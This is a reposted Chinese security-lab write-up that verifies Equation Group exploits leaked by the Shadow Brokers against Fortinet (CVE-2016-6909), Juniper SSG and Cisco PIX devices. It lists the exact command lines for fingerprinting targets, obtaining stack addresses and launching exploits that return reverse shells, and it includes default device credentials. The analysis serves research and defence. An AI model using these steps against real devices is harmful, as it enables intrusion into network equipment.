安全路透社
当前位置:安全路透社 > 网络转载 > 正文

NSA(美国国安局)泄漏Exploit分析

*本文原创作者:tigerlab

2016年8月16日,黑客团伙“The Shadow Brokers”声称自己入侵了“Equation Group“(方程式组织),并将他们从该黑客组织的计算机系统中所获取到的部分黑客工具泄漏在了互联网上。

泰格实验室第一时间对此次泄露的文件进行了深入分析,多数漏洞的验证分析情况已有同行分享,现将我们对另外三个未见分析的漏洞的验证分析分享给大家,其中包括fortinet、juniper、Cisco三种设备漏洞。

1、fortinet漏洞验证

该漏洞主要是Cookie解析器存在缓冲区溢出漏洞,远程攻击者可通过发送特制的HTTP请求利用该漏洞执行任意代码。

CVE编号:CVE-2016-6909

以下版本受到影响:

Fortinet FortiOS 4.1.11之前的4.x版本,

4.2.13之前的4.2.x版本,

4.3.9之前的4.3.x版本,

FortiSwitch 3.4.3之前的版本。

漏洞验证过程如下:

获取目标etag 判断版本类型

curl -X HEAD  –v   http://xxx.xxx.xxx.xxx/

 1.png

Etag:480d772a

如果etag小于4DXXXXXX,适用版本 3;

如果etag 大于 4DXXXXXX,判断是否需要cookienum

curl -X HEAD  –v   http://xxx.xxx.xxx.xxx/login

APSCOOKIE=0&0 ,在执行命令时不需要设置cookienum

 2.png

APSCOOKIE_2930800995=0&0 ,在执行命令时需要设置cookienum,且版本为4nc

 3.png

测试etag小于4DXXXXXX,且不存在cookienum

1)获取溢出地址

判断etag是否在存在于配置文件EGBL.config中,例:

 4.png

如不存在可通过以下命令获取堆栈地址:

./egregiousblunder_3.0.0.1 -t xxx.xxx.xxx.xxx-p 80 -l 5432 –ssl 0 -v –config ./EGBL.config –wam 10

该命令只适用于etag小于4DXXXXXX,且不存在cookienum,在其他版本中均失效,无法获取堆栈地址。

命令执行如下:

 4.png

成功获取堆栈地址 0Xbffff274

2)执行shellcode,返回shell

可通过直接传入stack堆栈地址来反弹shell,

./egregiousblunder_3.0.0.1 -t xxx.xxx.xxx.xxx -p 80 -l 5432 --ssl 0 -v --stack 0xbffff274  --nopen --gen 3

也可将etag写入配置文件

ETAG = 480d772a : 0xbffff274

./egregiousblunder_3.0.0.1 -t xxx.xxx.xxx.xxx -p 80 -l 5432 --ssl 0 -v –etag 480d772a --nopen --gen 3 --config ./EGBL.config

 5.png6.png

7.png

已成功返回shell,执行-ls命令获取文件目录信息。

本次测试主要低版本的飞塔设备,etag小于4DXXXXXX。由于未深入该漏洞exploit溢出过程,所以针对其他版本无法通过命令获取stack的,通过配置文件中的内存地址遍历进行了测试,也可以成功反弹shell。

2、juniper漏洞验证

该漏洞需要先获得juniper设备口令,在根据设备版本型号进行攻击,获取系统权限。

telnet登陆获取设备版本信息

 8.png

设备版本号是ssg5ssg20.6.1.0r2.0,查看Dats里面是否存在该设备文件

 9.png

漏洞复现

在BARGLEE文件夹中BICE-3110是juniper漏洞利用程序

./BICE-3110  -R *.*.*.*     //目标ip

-D 127.0.0.1   //接收反弹shell 主机ip

-d 5555       //接收反弹shell 主机端口

-m telnet      //登陆模式 ssh/telnet

-t  ../..//Dats/ssg5ssg20.6.1.0r2.0.xml  //攻击代码配置

-u netscreen    //设备账号

-p netscreen    //设备口令

成功之后返回设备基本信息,可选择2种shell权限,juniper交互shell及BI shell。

 10.png

Interactiver Console 实际就是juinper telnet进去之后的命令操作。

 11.png

BI shell

 12.png

可见可以执行的选项共有6项:

返回目标状态

卸载BARGLEE

安装BARGLEE

读内存

写内存

命令执行

根据script中BARICE.txt安装说明,尝试进行barglee植入

 13.png

多次尝试bin文件类型,均未能成功植入,不能对其进行深入性分析。

 14.png

3、Cisco EPBA漏洞验证

该漏洞与juniper一样需要先获取设备口令,之后通过溢出攻击获取系统权限。

漏洞复现

 15.png

 16.png

显示结果为received mtu – EPBA: ok, payload: ok,表示溢出成功。

与此同时,PIX722 防火墙控制端则会显示缓冲区溢出

 17.png

接下来我们根据操作提示执行bride-1120这个脚本, 在执行“1”选项后可以判断是否正常连接,连接成功则返回Session D-H Key 

 18.png

19.png

执行“8”之后可以查看BRICE的自带shell功能。

 20.png

多次尝试写入BatigerlabnanaGlee提示版本不对无法写入。

21.png                                          

分析发现其读取目标文件前4个字节来得到版本号,通过对文件夹内所有文件进

行了搜索也未找到合适的植入程序。

总结

本文主要分享的是forinet、juniper、cisco三个漏洞利用文件的验证思路及过程。在

分析过程中我们进行了大量测试实验,想尽可能还原其整个攻击流程,但由于部分关键文件缺失,未能继续对其进行完整分析。如果有小伙伴有更好的分析思路,可与我们交流。

*本文原创作者:tigerlab

未经允许不得转载:安全路透社 » NSA(美国国安局)泄漏Exploit分析

赞 (0)
分享到:更多 ()

评论 0

评论前必须登录!

登陆 注册